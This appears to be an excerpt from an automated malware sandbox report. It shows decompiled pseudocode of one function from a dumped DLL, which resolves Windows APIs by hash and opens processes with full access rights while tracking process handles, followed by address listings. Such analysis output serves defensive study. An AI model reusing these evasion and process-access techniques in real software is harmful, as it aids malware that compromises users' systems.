                                                                                        			E1000A52C(signed int* __ecx, void* __eflags) {
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				void* _t182;
                                                                                        				signed int _t183;
                                                                                        				signed int* _t188;
                                                                                        				void* _t198;
                                                                                        				void* _t199;
                                                                                        				void* _t228;
                                                                                        				void* _t229;
                                                                                        				void* _t242;
                                                                                        				void* _t243;
                                                                                        				void* _t251;
                                                                                        				signed int* _t271;
                                                                                        				void* _t282;
                                                                                        				void* _t284;
                                                                                        				void* _t285;
                                                                                        				void* _t296;
                                                                                        				signed int* _t308;
                                                                                        				void* _t324;
                                                                                        				signed int _t398;
                                                                                        				signed int _t402;
                                                                                        				intOrPtr* _t403;
                                                                                        				intOrPtr* _t404;
                                                                                        				signed int _t406;
                                                                                        				signed int _t407;
                                                                                        				signed int _t409;
                                                                                        				signed int _t411;
                                                                                        				signed int _t412;
                                                                                        				void* _t413;
                                                                                        				signed int _t414;
                                                                                        				signed int _t415;
                                                                                        				signed int _t416;
                                                                                        				signed int _t419;
                                                                                        				void* _t420;
                                                                                        				signed int _t421;
                                                                                        				void* _t422;
                                                                                        				signed int _t424;
                                                                                        				signed int _t429;
                                                                                        				signed int _t433;
                                                                                        				signed int _t434;
                                                                                        				signed int _t437;
                                                                                        				intOrPtr* _t439;
                                                                                        
                                                                                        				_t308 = __ecx;
                                                                                        				 *(_t439 + 0x78) = 0;
                                                                                        				 *_t439 = __ecx + 8;
                                                                                        				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
                                                                                        				while(1) {
                                                                                        					_t392 =  *_t308;
                                                                                        					E1000B69C(_t439 + 0x24, _t392, 0x7fffffff);
                                                                                        					if(E1000F4F4(_t439 + 0x24) == 0) {
                                                                                        						goto L3;
                                                                                        					} else {
                                                                                        						_t308[0xc] = 0;
                                                                                        						E1000F678(_t439 + 0x24);
                                                                                        					}
                                                                                        					L63:
                                                                                        					_t398 = 0xffffffffffffffff;
                                                                                        					_t407 = 0xffffffffffffffff;
                                                                                        					L65:
                                                                                        					if((_t407 | _t398) != 0) {
                                                                                        						L68:
                                                                                        						return _t407;
                                                                                        					}
                                                                                        					if( *(_t439 + 0x78) != 0x20) {
                                                                                        						E1001223C(0x5dc, _t392, _t407);
                                                                                        						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
                                                                                        						continue;
                                                                                        					}
                                                                                        					_t398 = 0xffffffffffffffff;
                                                                                        					_t407 = 0xffffffffffffffff;
                                                                                        					goto L68;
                                                                                        					L3:
                                                                                        					__eflags = _t308[1];
                                                                                        					if(_t308[1] <= 0) {
                                                                                        						L21:
                                                                                        						__eflags =  *(_t439 + 0x20);
                                                                                        						if( *(_t439 + 0x20) <= 0) {
                                                                                        							L33:
                                                                                        							E1000F678(_t439 + 0x24);
                                                                                        							__eflags = _t308[0xc];
                                                                                        							if(_t308[0xc] == 0) {
                                                                                        								L46:
                                                                                        								 *((intOrPtr*)(_t439 + 8)) = 0;
                                                                                        								 *((intOrPtr*)(_t439 + 0xc)) = 0;
                                                                                        								E1000F5A8(_t439 + 0x14, 0);
                                                                                        								 *((intOrPtr*)(_t439 + 0x38)) = 0;
                                                                                        								 *(_t439 + 0x34) =  *_t308;
                                                                                        								E1000F5A8(_t439 + 0x40, 0);
                                                                                        								_t182 = 0x40;
                                                                                        								__eflags = _t308[7] - 0x40;
                                                                                        								_t183 =  <  ? _t308[7] : _t182;
                                                                                        								 *(_t439 + 0x74) = _t183;
                                                                                        								__eflags = _t183;
                                                                                        								if(_t183 <= 0) {
                                                                                        									L57:
                                                                                        									asm("movq xmm0, [0x1001b808]");
                                                                                        									asm("movq [esp+0x84], xmm0");
                                                                                        									_t406 = E1001303C(0xfe338407, 0x8a79536f);
                                                                                        									__eflags = _t406;
                                                                                        									if(_t406 == 0) {
                                                                                        										_t424 = 0;
                                                                                        										__eflags = 0;
                                                                                        										L61:
                                                                                        										__eflags = _t424 - 0x3f;
                                                                                        										if(_t424 <= 0x3f) {
                                                                                        											__eflags = _t424 << 2;
                                                                                        											_t308[0xc] =  *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
                                                                                        											_t188 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
                                                                                        											_t407 = _t308[0xc];
                                                                                        											asm("cdq");
                                                                                        											_t308[0xd] =  *_t188;
                                                                                        											_t398 = _t392;
                                                                                        											E1000B608(_t439 + 0x34);
                                                                                        											E1000B608(_t439 + 8);
                                                                                        											goto L65;
                                                                                        										}
                                                                                        										L62:
                                                                                        										E1000B608(_t439 + 0x34);
                                                                                        										E1000B608(_t439 + 8);
                                                                                        										goto L63;
                                                                                        									}
                                                                                        									_t392 = E1000F4E0(_t439 + 0x14, 0);
                                                                                        									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
                                                                                        									_t133 = _t198 - 0x80; // -128
                                                                                        									_t199 = _t133;
                                                                                        									__eflags = _t199 - 0x3f;
                                                                                        									_t424 =  <=  ? _t199 : _t198;
                                                                                        									__eflags = _t424 - 0x102;
                                                                                        									if(_t424 == 0x102) {
                                                                                        										goto L62;
                                                                                        									}
                                                                                        									goto L61;
                                                                                        								}
                                                                                        								_t437 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									E1000CAD0(_t439 + 0x4c);
                                                                                        									_t392 = 0;
                                                                                        									_t324 = _t439 + 0x4c;
                                                                                        									 *((char*)(_t324 + 4)) = 0;
                                                                                        									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
                                                                                        									__eflags = E1000C2C4(_t324);
                                                                                        									if(__eflags != 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									E1000F84C(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 4);
                                                                                        									 *((intOrPtr*)(E1000F4E0(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
                                                                                        									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
                                                                                        									_t409 = E1001303C(0xfe338407, 0xa8c8a645);
                                                                                        									__eflags = _t409;
                                                                                        									if(_t409 == 0) {
                                                                                        										L51:
                                                                                        										_t392 =  *(_t439 + 0x68);
                                                                                        										__eflags = _t392;
                                                                                        										if(__eflags == 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										__eflags = _t392 - 0xffffffff;
                                                                                        										if(__eflags != 0) {
                                                                                        											E1000F84C(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 4);
                                                                                        											 *(E1000F4E0(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
                                                                                        											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
                                                                                        											E1000CD68(_t439 + 0x4c, __eflags);
                                                                                        											_t437 = _t437 + 1;
                                                                                        											__eflags = _t437 -  *(_t439 + 0x74);
                                                                                        											if(_t437 <  *(_t439 + 0x74)) {
                                                                                        												continue;
                                                                                        											}
                                                                                        											_t411 = 0;
                                                                                        											__eflags = 0;
                                                                                        											do {
                                                                                        												E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
                                                                                        												E1000F4E0(_t439 + 0x40, _t411 * 4);
                                                                                        												_t439 = _t439 + 0xffffffd8;
                                                                                        												asm("cdq");
                                                                                        												asm("pxor xmm5, xmm5");
                                                                                        												asm("movd xmm1, dword [ebp]");
                                                                                        												asm("movd xmm4, dword [edi]");
                                                                                        												asm("movd xmm0, edx");
                                                                                        												asm("cdq");
                                                                                        												asm("punpckldq xmm1, xmm0");
                                                                                        												asm("movq xmm2, [ebx+0x38]");
                                                                                        												asm("movq [esp], xmm1");
                                                                                        												asm("movd xmm3, edx");
                                                                                        												asm("punpckldq xmm4, xmm3");
                                                                                        												asm("movq [esp+0x8], xmm2");
                                                                                        												asm("movq [esp+0x10], xmm4");
                                                                                        												asm("movq [esp+0x18], xmm5");
                                                                                        												asm("movq [esp+0x20], xmm5");
                                                                                        												E1000AC8C(__eflags);
                                                                                        												_t411 = _t411 + 1;
                                                                                        												__eflags = _t411 -  *(_t439 + 0x74);
                                                                                        											} while (_t411 <  *(_t439 + 0x74));
                                                                                        											goto L57;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									_t392 = _t439 + 0x68;
                                                                                        									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
                                                                                        									__eflags = 0;
                                                                                        									if(0 != 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									goto L51;
                                                                                        								}
                                                                                        								E1000CD68(_t439 + 0x4c, __eflags);
                                                                                        								goto L62;
                                                                                        							}
                                                                                        							_t402 = _t308[1];
                                                                                        							__eflags = _t402;
                                                                                        							if(_t402 <= 0) {
                                                                                        								goto L46;
                                                                                        							}
                                                                                        							_t412 = 0;
                                                                                        							__eflags = 0;
                                                                                        							while(1) {
                                                                                        								_t429 = _t412 * 4;
                                                                                        								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429));
                                                                                        								__eflags = _t392 - _t308[0xd];
                                                                                        								if(_t392 == _t308[0xd]) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t412 = _t412 + 1;
                                                                                        								__eflags = _t412 - _t402;
                                                                                        								if(_t412 < _t402) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L46;
                                                                                        							}
                                                                                        							__eflags = _t412 - 0xffffffff;
                                                                                        							if(_t412 != 0xffffffff) {
                                                                                        								_t228 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                        								__eflags = _t228 - _t429;
                                                                                        								if(_t228 > _t429) {
                                                                                        									_t392 = 4 + _t412 * 4;
                                                                                        									 *(_t439 + 0x6c) = _t392;
                                                                                        									_t251 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                        									__eflags = _t251 -  *(_t439 + 0x6c);
                                                                                        									if(_t251 >  *(_t439 + 0x6c)) {
                                                                                        										 *((intOrPtr*)(_t439 + 0x90)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t429);
                                                                                        										 *((intOrPtr*)(_t439 + 0x8c)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
                                                                                        										E100138C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
                                                                                        										_t439 = _t439 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                        									_t74 =  &(_t308[7]);
                                                                                        									 *_t74 = _t308[7] - 1;
                                                                                        									__eflags =  *_t74;
                                                                                        								}
                                                                                        								_t229 = E1000F4F0( *_t439);
                                                                                        								__eflags = _t229 - _t429;
                                                                                        								if(_t229 > _t429) {
                                                                                        									_t413 = 4 + _t412 * 4;
                                                                                        									_t242 = E1000F4F0( *_t439);
                                                                                        									__eflags = _t242 - _t413;
                                                                                        									if(_t242 > _t413) {
                                                                                        										_t243 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429);
                                                                                        										 *((intOrPtr*)(_t439 + 0x94)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t413);
                                                                                        										E100138C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E1000F4F0( *_t439) - _t413);
                                                                                        										_t439 = _t439 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
                                                                                        									_t79 =  &(_t308[1]);
                                                                                        									 *_t79 = _t308[1] - 1;
                                                                                        									__eflags =  *_t79;
                                                                                        								}
                                                                                        								E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                        								 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
                                                                                        								_t308[7] = _t308[7] + 1;
                                                                                        								E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
                                                                                        								 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
                                                                                        								_t308[1] = _t308[1] + 1;
                                                                                        							}
                                                                                        							goto L46;
                                                                                        						}
                                                                                        						_t433 = 0;
                                                                                        						__eflags = 0;
                                                                                        						do {
                                                                                        							 *(_t439 + 0x70) = _t433 * 4;
                                                                                        							_t403 = E1000F4E0(_t439 + 0x28, _t433 * 4);
                                                                                        							_t392 = _t308[1];
                                                                                        							 *(_t439 + 0x80) = _t392;
                                                                                        							__eflags = _t392;
                                                                                        							if(_t392 <= 0) {
                                                                                        								L29:
                                                                                        								_t414 = E1001303C(0x10154545, 0xc2a75cb8);
                                                                                        								__eflags = _t414;
                                                                                        								if(_t414 != 0) {
                                                                                        									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
                                                                                        									__eflags = _t416;
                                                                                        									if(_t416 != 0) {
                                                                                        										E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                        										 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
                                                                                        										_t308[7] = _t308[7] + 1;
                                                                                        										_t271 = E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70));
                                                                                        										E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
                                                                                        										 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) =  *_t271;
                                                                                        										_t57 =  &(_t308[1]);
                                                                                        										 *_t57 = _t308[1] + 1;
                                                                                        										__eflags =  *_t57;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L32;
                                                                                        							}
                                                                                        							_t415 = 0;
                                                                                        							__eflags = 0;
                                                                                        							while(1) {
                                                                                        								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
                                                                                        								__eflags = _t392 -  *_t403;
                                                                                        								if(_t392 ==  *_t403) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t415 = _t415 + 1;
                                                                                        								__eflags = _t415 -  *(_t439 + 0x80);
                                                                                        								if(_t415 <  *(_t439 + 0x80)) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L29;
                                                                                        							}
                                                                                        							__eflags = _t415 - 0xffffffff;
                                                                                        							if(_t415 == 0xffffffff) {
                                                                                        								goto L29;
                                                                                        							}
                                                                                        							L32:
                                                                                        							_t433 = _t433 + 1;
                                                                                        							__eflags = _t433 -  *(_t439 + 0x20);
                                                                                        						} while (_t433 <  *(_t439 + 0x20));
                                                                                        						goto L33;
                                                                                        					} else {
                                                                                        						_t434 = 0;
                                                                                        						__eflags = 0;
                                                                                        						do {
                                                                                        							 *(_t439 + 0x64) = _t434 * 4;
                                                                                        							_t404 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
                                                                                        							_t392 =  *(_t439 + 0x20);
                                                                                        							 *(_t439 + 0x7c) = _t392;
                                                                                        							__eflags = _t392;
                                                                                        							if(_t392 <= 0) {
                                                                                        								L11:
                                                                                        								_t282 = E1000F4F0( *_t439);
                                                                                        								__eflags = _t282 -  *(_t439 + 0x64);
                                                                                        								if(_t282 >  *(_t439 + 0x64)) {
                                                                                        									_t420 = 4 + _t434 * 4;
                                                                                        									_t296 = E1000F4F0( *_t439);
                                                                                        									__eflags = _t296 - _t420;
                                                                                        									if(_t296 > _t420) {
                                                                                        										 *((intOrPtr*)(_t439 + 0x9c)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
                                                                                        										 *((intOrPtr*)(_t439 + 0x98)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t420);
                                                                                        										E100138C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E1000F4F0( *_t439) - _t420);
                                                                                        										_t439 = _t439 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
                                                                                        									_t22 =  &(_t308[1]);
                                                                                        									 *_t22 = _t308[1] - 1;
                                                                                        									__eflags =  *_t22;
                                                                                        								}
                                                                                        								_t419 = E1001303C(0xfe338407, 0x77fa1d17);
                                                                                        								__eflags = _t419;
                                                                                        								if(_t419 != 0) {
                                                                                        									 *_t419( *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
                                                                                        								}
                                                                                        								_t284 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                        								__eflags = _t284 -  *(_t439 + 0x64);
                                                                                        								if(_t284 >  *(_t439 + 0x64)) {
                                                                                        									_t422 = 4 + _t434 * 4;
                                                                                        									_t285 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                        									__eflags = _t285 - _t422;
                                                                                        									if(_t285 > _t422) {
                                                                                        										 *((intOrPtr*)(_t439 + 0xa4)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
                                                                                        										 *((intOrPtr*)(_t439 + 0xa0)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t422);
                                                                                        										E100138C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
                                                                                        										_t439 = _t439 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                        									_t33 =  &(_t308[7]);
                                                                                        									 *_t33 = _t308[7] - 1;
                                                                                        									__eflags =  *_t33;
                                                                                        								}
                                                                                        								_t434 = _t434 - 1;
                                                                                        								__eflags = _t434;
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t421 = 0;
                                                                                        							__eflags = 0;
                                                                                        							while(1) {
                                                                                        								_t392 =  *(E1000F4E0(_t439 + 0x28, _t421 * 4));
                                                                                        								__eflags = _t392 -  *_t404;
                                                                                        								if(_t392 ==  *_t404) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t421 = _t421 + 1;
                                                                                        								__eflags = _t421 -  *(_t439 + 0x7c);
                                                                                        								if(_t421 <  *(_t439 + 0x7c)) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L11;
                                                                                        							}
                                                                                        							__eflags = _t421 - 0xffffffff;
                                                                                        							if(_t421 == 0xffffffff) {
                                                                                        								goto L11;
                                                                                        							}
                                                                                        							L20:
                                                                                        							_t434 = _t434 + 1;
                                                                                        							__eflags = _t434 - _t308[1];
                                                                                        						} while (_t434 < _t308[1]);
                                                                                        						goto L21;
                                                                                        					}
                                                                                        				}
                                                                                        			}













































                                                                                        0x1000a536
                                                                                        0x1000a538
                                                                                        0x1000a543
                                                                                        0x1000a549
                                                                                        0x1000a54d
                                                                                        0x1000a552
                                                                                        0x1000a558
                                                                                        0x1000a568
                                                                                        0x00000000
                                                                                        0x1000a56a
                                                                                        0x1000a56a
                                                                                        0x1000a575
                                                                                        0x1000a575
                                                                                        0x1000aaf3
                                                                                        0x1000aaf5
                                                                                        0x1000aaf6
                                                                                        0x1000ab35
                                                                                        0x1000ab39
                                                                                        0x1000ab47
                                                                                        0x1000ab55
                                                                                        0x1000ab55
                                                                                        0x1000ab40
                                                                                        0x1000ab5b
                                                                                        0x1000ab60
                                                                                        0x00000000
                                                                                        0x1000ab60
                                                                                        0x1000ab44
                                                                                        0x1000ab45
                                                                                        0x00000000
                                                                                        0x1000a57f
                                                                                        0x1000a57f
                                                                                        0x1000a583
                                                                                        0x1000a68a
                                                                                        0x1000a68a
                                                                                        0x1000a68f
                                                                                        0x1000a7a0
                                                                                        0x1000a7a4
                                                                                        0x1000a7a9
                                                                                        0x1000a7ad
                                                                                        0x1000a8d7
                                                                                        0x1000a8d9
                                                                                        0x1000a8dd
                                                                                        0x1000a8e6
                                                                                        0x1000a8ef
                                                                                        0x1000a8f3
                                                                                        0x1000a8fc
                                                                                        0x1000a903
                                                                                        0x1000a904
                                                                                        0x1000a908
                                                                                        0x1000a90c
                                                                                        0x1000a910
                                                                                        0x1000a912
                                                                                        0x1000aa7c
                                                                                        0x1000aa7c
                                                                                        0x1000aa84
                                                                                        0x1000aa9c
                                                                                        0x1000aa9e
                                                                                        0x1000aaa0
                                                                                        0x1000aada
                                                                                        0x1000aada
                                                                                        0x1000aadc
                                                                                        0x1000aadc
                                                                                        0x1000aadf
                                                                                        0x1000aafa
                                                                                        0x1000ab0e
                                                                                        0x1000ab11
                                                                                        0x1000ab16
                                                                                        0x1000ab21
                                                                                        0x1000ab22
                                                                                        0x1000ab25
                                                                                        0x1000ab27
                                                                                        0x1000ab30
                                                                                        0x00000000
                                                                                        0x1000ab30
                                                                                        0x1000aae1
                                                                                        0x1000aae5
                                                                                        0x1000aaee
                                                                                        0x00000000
                                                                                        0x1000aaee
                                                                                        0x1000aab1
                                                                                        0x1000aac1
                                                                                        0x1000aac5
                                                                                        0x1000aac5
                                                                                        0x1000aac8
                                                                                        0x1000aacb
                                                                                        0x1000aace
                                                                                        0x1000aad4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000aad6
                                                                                        0x1000a91a
                                                                                        0x1000a91a
                                                                                        0x1000a91c
                                                                                        0x1000a920
                                                                                        0x1000a925
                                                                                        0x1000a927
                                                                                        0x1000a92b
                                                                                        0x1000a92e
                                                                                        0x1000a936
                                                                                        0x1000a938
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a94f
                                                                                        0x1000a96a
                                                                                        0x1000a96c
                                                                                        0x1000a97f
                                                                                        0x1000a981
                                                                                        0x1000a983
                                                                                        0x1000a99e
                                                                                        0x1000a99e
                                                                                        0x1000a9a2
                                                                                        0x1000a9a4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a9a6
                                                                                        0x1000a9a9
                                                                                        0x1000a9ca
                                                                                        0x1000a9e9
                                                                                        0x1000a9ef
                                                                                        0x1000a9f2
                                                                                        0x1000a9f7
                                                                                        0x1000a9f8
                                                                                        0x1000a9fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000aa04
                                                                                        0x1000aa04
                                                                                        0x1000aa06
                                                                                        0x1000aa12
                                                                                        0x1000aa1e
                                                                                        0x1000aa28
                                                                                        0x1000aa2b
                                                                                        0x1000aa2e
                                                                                        0x1000aa32
                                                                                        0x1000aa39
                                                                                        0x1000aa3d
                                                                                        0x1000aa41
                                                                                        0x1000aa42
                                                                                        0x1000aa46
                                                                                        0x1000aa4b
                                                                                        0x1000aa50
                                                                                        0x1000aa54
                                                                                        0x1000aa58
                                                                                        0x1000aa5e
                                                                                        0x1000aa64
                                                                                        0x1000aa6a
                                                                                        0x1000aa70
                                                                                        0x1000aa75
                                                                                        0x1000aa76
                                                                                        0x1000aa76
                                                                                        0x00000000
                                                                                        0x1000aa06
                                                                                        0x00000000
                                                                                        0x1000a9a9
                                                                                        0x1000a987
                                                                                        0x1000a998
                                                                                        0x1000a99a
                                                                                        0x1000a99c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a99c
                                                                                        0x1000a9af
                                                                                        0x00000000
                                                                                        0x1000a9af
                                                                                        0x1000a7b3
                                                                                        0x1000a7b6
                                                                                        0x1000a7b8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a7c0
                                                                                        0x1000a7c0
                                                                                        0x1000a7c2
                                                                                        0x1000a7c2
                                                                                        0x1000a7d3
                                                                                        0x1000a7d5
                                                                                        0x1000a7d8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a8ce
                                                                                        0x1000a8cf
                                                                                        0x1000a8d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a8d1
                                                                                        0x1000a7de
                                                                                        0x1000a7e1
                                                                                        0x1000a7eb
                                                                                        0x1000a7f0
                                                                                        0x1000a7f2
                                                                                        0x1000a7f8
                                                                                        0x1000a7ff
                                                                                        0x1000a803
                                                                                        0x1000a808
                                                                                        0x1000a80c
                                                                                        0x1000ac47
                                                                                        0x1000ac5b
                                                                                        0x1000ac7e
                                                                                        0x1000ac83
                                                                                        0x1000ac83
                                                                                        0x1000a823
                                                                                        0x1000a828
                                                                                        0x1000a828
                                                                                        0x1000a828
                                                                                        0x1000a828
                                                                                        0x1000a82e
                                                                                        0x1000a833
                                                                                        0x1000a835
                                                                                        0x1000a83a
                                                                                        0x1000a841
                                                                                        0x1000a846
                                                                                        0x1000a848
                                                                                        0x1000ac05
                                                                                        0x1000ac16
                                                                                        0x1000ac30
                                                                                        0x1000ac35
                                                                                        0x1000ac35
                                                                                        0x1000a85e
                                                                                        0x1000a863
                                                                                        0x1000a863
                                                                                        0x1000a863
                                                                                        0x1000a863
                                                                                        0x1000a877
                                                                                        0x1000a895
                                                                                        0x1000a89a
                                                                                        0x1000a8aa
                                                                                        0x1000a8c7
                                                                                        0x1000a8c9
                                                                                        0x1000a8c9
                                                                                        0x00000000
                                                                                        0x1000a7e1
                                                                                        0x1000a697
                                                                                        0x1000a697
                                                                                        0x1000a699
                                                                                        0x1000a6a0
                                                                                        0x1000a6ae
                                                                                        0x1000a6b0
                                                                                        0x1000a6b3
                                                                                        0x1000a6ba
                                                                                        0x1000a6bc
                                                                                        0x1000a6ed
                                                                                        0x1000a6fc
                                                                                        0x1000a6fe
                                                                                        0x1000a700
                                                                                        0x1000a71e
                                                                                        0x1000a720
                                                                                        0x1000a722
                                                                                        0x1000a735
                                                                                        0x1000a754
                                                                                        0x1000a75a
                                                                                        0x1000a75d
                                                                                        0x1000a774
                                                                                        0x1000a790
                                                                                        0x1000a792
                                                                                        0x1000a792
                                                                                        0x1000a792
                                                                                        0x1000a792
                                                                                        0x1000a722
                                                                                        0x00000000
                                                                                        0x1000a700
                                                                                        0x1000a6c0
                                                                                        0x1000a6c0
                                                                                        0x1000a6c2
                                                                                        0x1000a6d3
                                                                                        0x1000a6d5
                                                                                        0x1000a6d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a6e3
                                                                                        0x1000a6e4
                                                                                        0x1000a6eb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a6eb
                                                                                        0x1000a6d9
                                                                                        0x1000a6dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a795
                                                                                        0x1000a795
                                                                                        0x1000a796
                                                                                        0x1000a796
                                                                                        0x00000000
                                                                                        0x1000a589
                                                                                        0x1000a58b
                                                                                        0x1000a58b
                                                                                        0x1000a58d
                                                                                        0x1000a594
                                                                                        0x1000a5a2
                                                                                        0x1000a5a4
                                                                                        0x1000a5a8
                                                                                        0x1000a5ac
                                                                                        0x1000a5ae
                                                                                        0x1000a5dc
                                                                                        0x1000a5df
                                                                                        0x1000a5e4
                                                                                        0x1000a5e8
                                                                                        0x1000a5ed
                                                                                        0x1000a5f4
                                                                                        0x1000a5f9
                                                                                        0x1000a5fb
                                                                                        0x1000abc2
                                                                                        0x1000abd3
                                                                                        0x1000abf3
                                                                                        0x1000abf8
                                                                                        0x1000abf8
                                                                                        0x1000a611
                                                                                        0x1000a616
                                                                                        0x1000a616
                                                                                        0x1000a616
                                                                                        0x1000a616
                                                                                        0x1000a628
                                                                                        0x1000a62a
                                                                                        0x1000a62c
                                                                                        0x1000a63d
                                                                                        0x1000a63d
                                                                                        0x1000a643
                                                                                        0x1000a648
                                                                                        0x1000a64c
                                                                                        0x1000a652
                                                                                        0x1000a659
                                                                                        0x1000a65e
                                                                                        0x1000a660
                                                                                        0x1000ab76
                                                                                        0x1000ab87
                                                                                        0x1000aba8
                                                                                        0x1000abad
                                                                                        0x1000abad
                                                                                        0x1000a677
                                                                                        0x1000a67c
                                                                                        0x1000a67c
                                                                                        0x1000a67c
                                                                                        0x1000a67c
                                                                                        0x1000a67f
                                                                                        0x1000a67f
                                                                                        0x00000000
                                                                                        0x1000a67f
                                                                                        0x1000a5b2
                                                                                        0x1000a5b2
                                                                                        0x1000a5b4
                                                                                        0x1000a5c5
                                                                                        0x1000a5c7
                                                                                        0x1000a5c9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a5d5
                                                                                        0x1000a5d6
                                                                                        0x1000a5da
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a5da
                                                                                        0x1000a5cb
                                                                                        0x1000a5ce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000a680
                                                                                        0x1000a680
                                                                                        0x1000a681
                                                                                        0x1000a681
                                                                                        0x00000000
                                                                                        0x1000a58d
                                                                                        0x1000a583

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
